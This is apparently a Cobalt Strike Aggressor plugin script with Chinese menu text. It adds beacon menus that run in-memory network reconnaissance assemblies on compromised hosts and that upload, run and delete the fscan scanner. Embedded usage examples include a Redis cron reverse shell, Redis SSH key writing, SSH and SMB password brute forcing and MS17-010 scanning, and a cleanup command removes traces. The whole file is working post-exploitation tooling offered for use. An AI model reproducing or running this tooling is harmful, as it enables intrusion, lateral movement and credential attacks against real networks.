##############################
#                            #
#                            #
#                            #
#       xway.cn@panda8       #
#       secquan.org@panda8   #
#		t00ls.com@panda8     #
#                            #
#                            #
#                            #
##############################
menu "资产探测" {
			item "Ladon" {
			$bid = $1['@'];
			$dialog = dialog("资产探测", %(ip => "192.168.1.0/24",bid => $bid), &zichanscan);
			dialog_description($dialog, "OnlinePC-多协议探测存活主机;OnlineIP-扫描存活主机;OsScan-多协议识别操作系统;");
			drow_combobox($dialog, "type", "type:", @("OnlinePC","OnlineIP","OSScan","Ping","WebScan","WhatCMS","DomainIP","SameWeb","UrlScan","HostIP","LdapScan","FtpScan"));
			drow_text($dialog, "ip", "ip:  ");			
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub zichanscan {
	$arg = join(' ',  @($3['ip'],$3['type']));
	btask($bid, "###################################",  "");
    btask($bid, "##  OnlinePC-多协议探测存活主机   ##", "");
    btask($bid, "##  OnlineIP-扫描存活主机         ##", "");
    btask($bid, "##  OsScan-多协议识别操作系统     ##", "");
	btask($bid, "##  Ping-ICMP扫描存活主机         ##", "");
    btask($bid, "##  WebScan-扫描Web信息/Http服务  ##", "");
    btask($bid, "##  UrlScan-扫描C段站点URL域名    ##", "");
    btask($bid, "##  SameWeb-扫描C段站点URL域名    ##", "");
    btask($bid, "##  DomainIP-域名解析IP           ##", "");
	btask($bid, "##  HostIP-主机名解析IP           ##", "");
	btask($bid, "##  WhatCMS-扫描C段WEB以及CMS     ##", "");
	btask($bid, "##  LdapScan-扫描LDAP服务器       ##", "");
	btask($bid, "##  FtpScan-扫描FTP服务器         ##", "");
	btask($bid, "###################################",  "");
	bexecute_assembly($bid, script_resource("/script/Ladon.exe"), $arg);
}


			item "SharpWebScan" {
			$bid = $1['@'];
			$dialog = dialog("SharpWebScan", %(iptype => "-IP",ip => beacon_info($bid,"internal"),port => "80,8080,8001,1433",bid => $bid), &SharpWebScan);
			dialog_description($dialog, "扫描web应用,返回web地址和title。");
			drow_text($dialog, "ip", "ip:  ");	
			drow_text($dialog, "port", "ports:  ");			
			drow_combobox($dialog, "iptype", "-ip/-cip", @("-IP", "-CIP"));
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
       }
sub SharpWebScan {
	$arg = join(' ', @($3['iptype'],$3['ip'],$3['port']));
	bexecute_assembly($bid, script_resource("/script/SharpWebScan.exe"), $arg);
}

			item "SharpGetTitle" {
			$bid = $1['@'];
			$dialog = dialog("SharpGetTitle", %(ip => "127.0.0.1||127.0.0.1/24",ports => "80-99,443,7001",thread => "100",outfile => "c:\\windows\\Temp\\123.txt",bid => $bid), &SharpGetTitle);
			dialog_description($dialog, "扫描web应用,返回web地址和title,会在本地输出文件");
			drow_text($dialog, "ip", "ip:  ");	
			drow_text($dialog, "ports", "ports:  ");
			drow_text($dialog, "thread", "thread:  ");
			drow_text($dialog, "outfile", "outfile:  ");				
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
       }
sub SharpGetTitle {
	$arg = join(' ', @("-i",$3['ip'],"-p",$3['ports'],"-t",$3['thread'],"-o",$3['outfile'],"-v"));
	bexecute_assembly($bid, script_resource("/script/SharpGetTitle.exe"), $arg);
}

			item "探测多网卡主机" {
			$bid = $1['@'];
			$dialog = dialog("SharpOXID-Find", %(ip => "192.168.1.1/24",bid => $bid), &SharpOXID-Find);
			dialog_description($dialog, "OXID 解析器，用于探测多网口机器（依赖于 135 端口）,-i扫描指定ip,-c扫描C段。");
			drow_combobox($dialog, "type", "type:", @("-i","-c"));
			drow_text($dialog, "ip", "ip:  ");			
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub SharpOXID-Find {
	$arg = join(' ',  @($3['type'],$3['ip']));
	bexecute_assembly($bid, script_resource("/script/SharpOXID-Find.exe"), $arg);
}	
  menu "Fscan" {
    item "上传 Fscan" {
      $bid = $1;
      $dialog = dialog("上传fscan", %(UploadPath => "C:\\Windows\\Temp\\", bid => $bid), &fscan);
      dialog_description($dialog, "上传fscan");
      drow_text($dialog, "UploadPath",  "上传路径: ");
      dbutton_action($dialog, "上传");
      dialog_show($dialog);
    }
    sub fscan {
      bcd($bid, $3['UploadPath']);
      if (-is64 $bid['id']) {
        bupload($bid, script_resource("/script/x64/fscan.exe"));
      }else{
        bupload($bid, script_resource("/script/x86/fscan.exe"));
      }      
    }
    item "运行 Fscan" {

      $bid = $1['@'];
      btask($bid, "
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后，命令执行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径) 
fscan.exe -h 192.168.1.1/8  (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
fscan.exe -hf ip.txt  (以文件导入)
fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)
fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)", "");      

      $dialog = dialog("运行fscan",%(exec => "fscan.exe -h 192.168.1.1/24 -o out.txt", bid => $bid),&fscan_run);
      dialog_description($dialog, "输入fscan命令：");
      drow_text($dialog, "exec", "Exec: ");
      dbutton_action($dialog, "运行");
      dialog_show($dialog);
    }
    sub fscan_run{
      $exec = $3['exec'];
      brun($bid, "$exec");
    }
	
			item "关闭 Fscan"{
			local('$bid');
			foreach $bid ($1){
				bshell($1, "taskkill -f /im modify.exe");
			}
		}
			item "删除 Fscan" {
			$bid = $1['@'];
			bshell($bid, "taskkill -f /im fscan.exe & del /f /s /q fscan.exe & del /f /s /q out.txt");
    }
  }
}